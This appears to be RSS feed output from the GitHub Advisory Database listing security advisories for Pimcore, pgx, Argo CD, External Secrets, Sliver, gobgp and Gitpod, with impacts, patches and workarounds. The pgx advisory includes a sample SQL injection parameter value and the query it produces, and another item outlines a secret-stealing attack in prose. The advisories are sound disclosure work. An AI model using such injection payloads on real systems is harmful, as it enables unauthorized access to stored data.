<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/pimcore] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/pimcore] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
</channel>
</rss>... |
http://localhost:1200/github-advisor/data/go - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - go</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/go" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - go - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:32:37 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[github.com/jackc/pgproto3/v2] pgproto3 SQL Injection via Protocol Message Size Overflow</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control.</p>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v2.3.3</p>
<h3 id="workarounds">Workarounds</h3>
<p>Reject user input large enough to cause a single query or bind message to exceed 4 GB in size.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-27304">https://nvd.nist.gov/vuln/detail/CVE-2024-27304</a></li>
<li><a href="https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007">https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007</a></li>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv">https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv</a></li>
<li><a href="https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4">https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4</a></li>
<li><a href="https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8">https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7jwh-3vrq-q3m8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7jwh-3vrq-q3m8</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/jackc/pgx/v5] pgx SQL Injection via Protocol Message Size Overflow</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control.</p>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v4.18.2 and v5.5.4.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Reject user input large enough to cause a single query or bind message to exceed 4 GB in size.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv">https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv</a></li>
<li><a href="https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007">https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007</a></li>
<li><a href="https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4">https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4</a></li>
<li><a href="https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8">https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-mrww-27vc-gghv">https://github.com/advisories/GHSA-mrww-27vc-gghv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mrww-27vc-gghv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mrww-27vc-gghv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/jackc/pgx/v4] pgx SQL Injection via Protocol Message Size Overflow</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control.</p>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v4.18.2 and v5.5.4.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Reject user input large enough to cause a single query or bind message to exceed 4 GB in size.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv">https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv</a></li>
<li><a href="https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007">https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007</a></li>
<li><a href="https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4">https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4</a></li>
<li><a href="https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8">https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-mrww-27vc-gghv">https://github.com/advisories/GHSA-mrww-27vc-gghv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mrww-27vc-gghv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mrww-27vc-gghv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/jackc/pgx/v4] pgx SQL Injection via Line Comment Creation</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur when all of the following conditions are met:</p>
<ol>
<li>The non-default simple protocol is used.</li>
<li>A placeholder for a numeric value must be immediately preceded by a minus.</li>
<li>There must be a second placeholder for a string value after the first placeholder; both
must be on the same line.</li>
<li>Both parameter values must be user-controlled.</li>
</ol>
<p>e.g. </p>
<p>Simple mode must be enabled:</p>
<pre><code class="language-go">// connection string includes "prefer_simple_protocol=true"
// or
// directly enabled in code
config.ConnConfig.PreferSimpleProtocol = true
</code></pre>
<p>Parameterized query:</p>
<pre><code class="language-sql">SELECT * FROM example WHERE result=-$1 OR name=$2;
</code></pre>
<p>Parameter values:</p>
<p><code>$1</code> =&gt; <code>-42</code>
<code>$2</code> =&gt; <code>"foo\n 1 AND 1=0 UNION SELECT * FROM secrets; --"</code></p>
<p>Resulting query after preparation:</p>
<pre><code class="language-sql">SELECT * FROM example WHERE result=--42 OR name= 'foo
1 AND 1=0 UNION SELECT * FROM secrets; --';
</code></pre>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v4.18.2.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Do not use the simple protocol or do not place a minus directly before a placeholder.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p">https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-m7wr-2xf7-cm9p">https://github.com/advisories/GHSA-m7wr-2xf7-cm9p</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-m7wr-2xf7-cm9p</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-m7wr-2xf7-cm9p</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/argoproj/argo-cd/v2] Argo CD leaks repository credentials in user-facing error messages and in logs</title>
<description><h3 id="impact">Impact</h3>
<p>All versions of Argo CD starting with v2.6.0-rc1 have an output sanitization bug which leaks repository access credentials in error messages. These error messages are visible to the user, and they are logged. The error message is visible when a user attempts to create or update an Application via the Argo CD API (and therefor the UI or CLI). The user must have <code>applications, create</code> or <code>applications, update</code> RBAC access to reach the code which may produce the error.</p>
<p>The user is not guaranteed to be able to trigger the error message. They may attempt to spam the API with requests to trigger a rate limit error from the upstream repository. </p>
<p>If the user has <code>repositories, update</code> access, they may edit an existing repository to introduce a URL typo or otherwise force an error message. But if they have that level of access, they are probably intended to have access to the credentials anyway.</p>
<h3 id="patches">Patches</h3>
<p>A patch for this vulnerability has been released in the following Argo CD version:</p>
<ul>
<li>v2.6.1</li>
</ul>
<h3 id="workarounds">Workarounds</h3>
<p>The only way to completely resolve the issue is to upgrade.</p>
<h4 id="mitigations">Mitigations</h4>
<p>To mitigate the issue, make sure that your repo credentials have only least necessary privileges. For example, the credentials should not have push access, and they should not have access to more resources than what Argo CD actually needs (for example, a whole GitHub org when only one repo is needed).</p>
<p>To further mitigate the impact of a leaked write-capable repo credential, you could <a href="https://argo-cd.readthedocs.io/en/stable/user-guide/gpg-verification/#enforcing-signature-verification">enable commit signature verification</a>. Even if someone could push a malicious commit, the commit would not by synced.</p>
<p>You should also enforce least privileges in Argo CD RBAC. Make sure users only have <code>repositories, update</code>, <code>applications, update</code>, or <code>applications, create</code> access if they absolutely need it.</p>
<h3 id="references">References</h3>
<ul>
<li>The problem was initially reported in a <a href="https://github.com/argoproj/argo-cd/issues/12309">GitHub issue</a></li>
<li><a href="https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac/">Argo CD RBAC configuration documentation</a></li>
</ul>
<h3 id="for-more-information">For more information</h3>
<ul>
<li>Open an issue in <a href="https://github.com/argoproj/argo-cd/issues">the Argo CD issue tracker</a> or <a href="https://github.com/argoproj/argo-cd/discussions">discussions</a></li>
<li>Join us on <a href="https://argoproj.github.io/community/join-slack">Slack</a> in channel #argo-cd</li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw">https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-25163">https://nvd.nist.gov/vuln/detail/CVE-2023-25163</a></li>
<li><a href="https://github.com/argoproj/argo-cd/issues/12309">https://github.com/argoproj/argo-cd/issues/12309</a></li>
<li><a href="https://github.com/argoproj/argo-cd/pull/12320">https://github.com/argoproj/argo-cd/pull/12320</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2023-1548">https://pkg.go.dev/vuln/GO-2023-1548</a></li>
<li><a href="https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac">https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac</a></li>
<li><a href="https://github.com/advisories/GHSA-mv6w-j4xc-qpfw">https://github.com/advisories/GHSA-mv6w-j4xc-qpfw</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mv6w-j4xc-qpfw</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mv6w-j4xc-qpfw</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/gouniverse/cms] Gouniverse GoLang CMS vulnerable to Cross-site Scripting</title>
<description><p>A vulnerability was found in Gouniverse GoLang CMS 1.4.0. It has been declared as problematic. This vulnerability affects the function PageRenderHtmlByAlias of the file FrontendHandler.go. The manipulation of the argument alias leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.4.1 is able to address this issue. The patch is identified as 3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c. It is recommended to upgrade the affected component.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8572">https://nvd.nist.gov/vuln/detail/CVE-2024-8572</a></li>
<li><a href="https://github.com/gouniverse/cms/issues/5">https://github.com/gouniverse/cms/issues/5</a></li>
<li><a href="https://github.com/gouniverse/cms/issues/5#issuecomment-2330848731">https://github.com/gouniverse/cms/issues/5#issuecomment-2330848731</a></li>
<li><a href="https://github.com/gouniverse/cms/commit/3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c">https://github.com/gouniverse/cms/commit/3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c</a></li>
<li><a href="https://github.com/gouniverse/cms/releases/tag/v1.4.1">https://github.com/gouniverse/cms/releases/tag/v1.4.1</a></li>
<li><a href="https://vuldb.com/?ctiid.276802">https://vuldb.com/?ctiid.276802</a></li>
<li><a href="https://vuldb.com/?id.276802">https://vuldb.com/?id.276802</a></li>
<li><a href="https://vuldb.com/?submit.401896">https://vuldb.com/?submit.401896</a></li>
<li><a href="https://github.com/advisories/GHSA-pv7h-hg6m-82j8">https://github.com/advisories/GHSA-pv7h-hg6m-82j8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pv7h-hg6m-82j8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pv7h-hg6m-82j8</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/external-secrets/external-secrets] External Secrets Operator vulnerable to privilege escalation</title>
<description><h3 id="details">Details</h3>
<p>The external-secrets has a deployment called default-external-secrets-cert-controller, which is bound with a same-name ClusterRole. This ClusterRole has "get/list" verbs of secrets resources(<a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49</a>). It also has path/update verb of validatingwebhookconfigurations resources(<a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27</a>). As a result, if a malicious user can access the worker node which has this deployment. he/she can:</p>
<ol>
<li><p>For the "get/list secrets" permission, he/she can abuse the SA token of this deployment to retrieve or get ALL secrets in the whole cluster, including the cluster-admin secret if created. After that, he/she can abuse the cluster-admin secret to do whatever he/she likes to the whole cluster, resulting in a cluster-level privilege escalation.</p>
</li>
<li><p>For the patch/update verb of validatingwebhookconfigurations, the malicious user can abuse these permissions to get sensitive data or lanuch DoS attacks:</p>
</li>
</ol>
<p>For the privilege escalation attack, by updating/patching a Webhook to make it listen to Secret update operations, the attacker can capture and log all data from requests attempting to update Secrets. More specifically, when a Secret is updated, this Webhook sends the request data to the logging-service, which can then log the content of the Secret. This way, an attacker could indirectly gain access to the full contents of the Secret.</p>
<p>For the DoS attack, by updating/patching a Webhook, and making it deny all Pod create and update requests, the attacker can prevent any new Pods from being created or existing Pods from being updated, resulting in a Denial of Service (DoS) attack.</p>
<h3 id="poc">PoC</h3>
<p>Please see the "Details" section</p>
<h3 id="impact">Impact</h3>
<p>Privilege escalation</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/external-secrets/external-secrets/security/advisories/GHSA-qwgc-rr35-h4x9">https://github.com/external-secrets/external-secrets/security/advisories/GHSA-qwgc-rr35-h4x9</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45041">https://nvd.nist.gov/vuln/detail/CVE-2024-45041</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/commit/0368b9806f660fa6bc52cbbf3c6ccdb27c58bb35">https://github.com/external-secrets/external-secrets/commit/0368b9806f660fa6bc52cbbf3c6ccdb27c58bb35</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/commit/428a452fd2ad45935312f2c2c0d40bc37ce6e67c">https://github.com/external-secrets/external-secrets/commit/428a452fd2ad45935312f2c2c0d40bc37ce6e67c</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49</a></li>
<li><a href="https://github.com/advisories/GHSA-qwgc-rr35-h4x9">https://github.com/advisories/GHSA-qwgc-rr35-h4x9</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-qwgc-rr35-h4x9</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-qwgc-rr35-h4x9</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/bishopfox/sliver] Silver vulnerable to MitM attack against implants due to a cryptography vulnerability</title>
<description><h3 id="summary">Summary</h3>
<p>The current cryptography implementation in Sliver up to version 1.5.39 allows a MitM with access to the corresponding implant binary to execute arbitrary codes on implanted devices via intercepted and crafted responses. (Reserved CVE ID: CVE-2023-34758)</p>
<h3 id="details">Details</h3>
<p>Please see <a href="https://github.com/tangent65536/Slivjacker">the PoC repo</a>.</p>
<h3 id="poc">PoC</h3>
<p>Please also see <a href="https://github.com/tangent65536/Slivjacker">the PoC repo</a>.
To setup a simple PoC environment, </p>
<ol>
<li>Generate an implant with its C2 set to the PoC server's address and copy the embedded private implant key and public server key into the config json. </li>
<li>Run the implant on a separate VM and a <code>notepad.exe</code> window should pop up on the implanted VM.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>A successful attack grants the attacker permission to execute arbitrary code on the implanted device. </p>
<h3 id="references">References</h3>
<p><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go</a><br><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go</a><br><a href="https://github.com/tangent65536/Slivjacker">https://github.com/tangent65536/Slivjacker</a> </p>
<h3 id="credits">Credits</h3>
<p><a href="https://github.com/tangent65536">Ting-Wei Hsieh</a> from <a href="https://www.chtsecurity.com/?lang=en">CHT Security Co. Ltd.</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/BishopFox/sliver/security/advisories/GHSA-8jxm-xp43-qh3q">https://github.com/BishopFox/sliver/security/advisories/GHSA-8jxm-xp43-qh3q</a></li>
<li><a href="https://github.com/BishopFox/sliver/commit/2d1ea6192cac2ff9d6450b2d96043fdbf8561516">https://github.com/BishopFox/sliver/commit/2d1ea6192cac2ff9d6450b2d96043fdbf8561516</a></li>
<li><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go</a></li>
<li><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go</a></li>
<li><a href="https://github.com/BishopFox/sliver/releases/tag/v1.5.40">https://github.com/BishopFox/sliver/releases/tag/v1.5.40</a></li>
<li><a href="https://github.com/tangent65536/Slivjacker">https://github.com/tangent65536/Slivjacker</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-35170">https://nvd.nist.gov/vuln/detail/CVE-2023-35170</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-34758">https://nvd.nist.gov/vuln/detail/CVE-2023-34758</a></li>
<li><a href="https://www.chtsecurity.com/news/04f41dcc-1851-463c-93bc-551323ad8091">https://www.chtsecurity.com/news/04f41dcc-1851-463c-93bc-551323ad8091</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2023-1866">https://pkg.go.dev/vuln/GO-2023-1866</a></li>
<li><a href="https://github.com/advisories/GHSA-8jxm-xp43-qh3q">https://github.com/advisories/GHSA-8jxm-xp43-qh3q</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8jxm-xp43-qh3q</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8jxm-xp43-qh3q</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/osrg/gobgp/v3] Buffer Overflow vulnerability in osrg gobgp</title>
<description><p>Buffer Overflow vulnerability in osrg gobgp commit 419c50dfac578daa4d11256904d0dc182f1a9b22 allows a remote attacker to cause a denial of service via the handlingError function in pkg/server/fsm.go.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46565">https://nvd.nist.gov/vuln/detail/CVE-2023-46565</a></li>
<li><a href="https://github.com/osrg/gobgp/issues/2725">https://github.com/osrg/gobgp/issues/2725</a></li>
<li><a href="https://github.com/osrg/gobgp/commit/419c50dfac578daa4d11256904d0dc182f1a9b22">https://github.com/osrg/gobgp/commit/419c50dfac578daa4d11256904d0dc182f1a9b22</a></li>
<li><a href="https://github.com/advisories/GHSA-6rqv-5cg7-m4x3">https://github.com/advisories/GHSA-6rqv-5cg7-m4x3</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6rqv-5cg7-m4x3</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6rqv-5cg7-m4x3</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/gitpod-io/gitpod] github.com/gitpod-io/gitpod vulnerable to Cookie Tossing</title>
<description><p>Versions of the package github.com/gitpod-io/gitpod/components/server/go/pkg/lib before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/components/ws-proxy/pkg/proxy before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/install/installer/pkg/components/auth before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/install/installer/pkg/components/public-api-server before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/install/installer/pkg/components/server before main-gha.27122; versions of the package @gitpod/gitpod-protocol before 0.1.5-main-gha.27122 are vulnerable to Cookie Tossing due to a missing __Host- prefix on the <em>gitpod_io_jwt2</em> session cookie. This allows an adversary who controls a subdomain to set the value of the cookie on the Gitpod control plane, which can be assigned to an attacker’s own JWT so that specific actions taken by the victim (such as connecting a new Github organization) are actioned by the attackers session.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21583">https://nvd.nist.gov/vuln/detail/CVE-2024-21583</a></li>
<li><a href="https://github.com/gitpod-io/gitpod/pull/19973">https://github.com/gitpod-io/gitpod/pull/19973</a></li>
<li><a href="https://github.com/gitpod-io/gitpod/commit/da1053e1013f27a56e6d3533aa251dbd241d0155">https://github.com/gitpod-io/gitpod/commit/da1053e1013f27a56e6d3533aa251dbd241d0155</a></li>
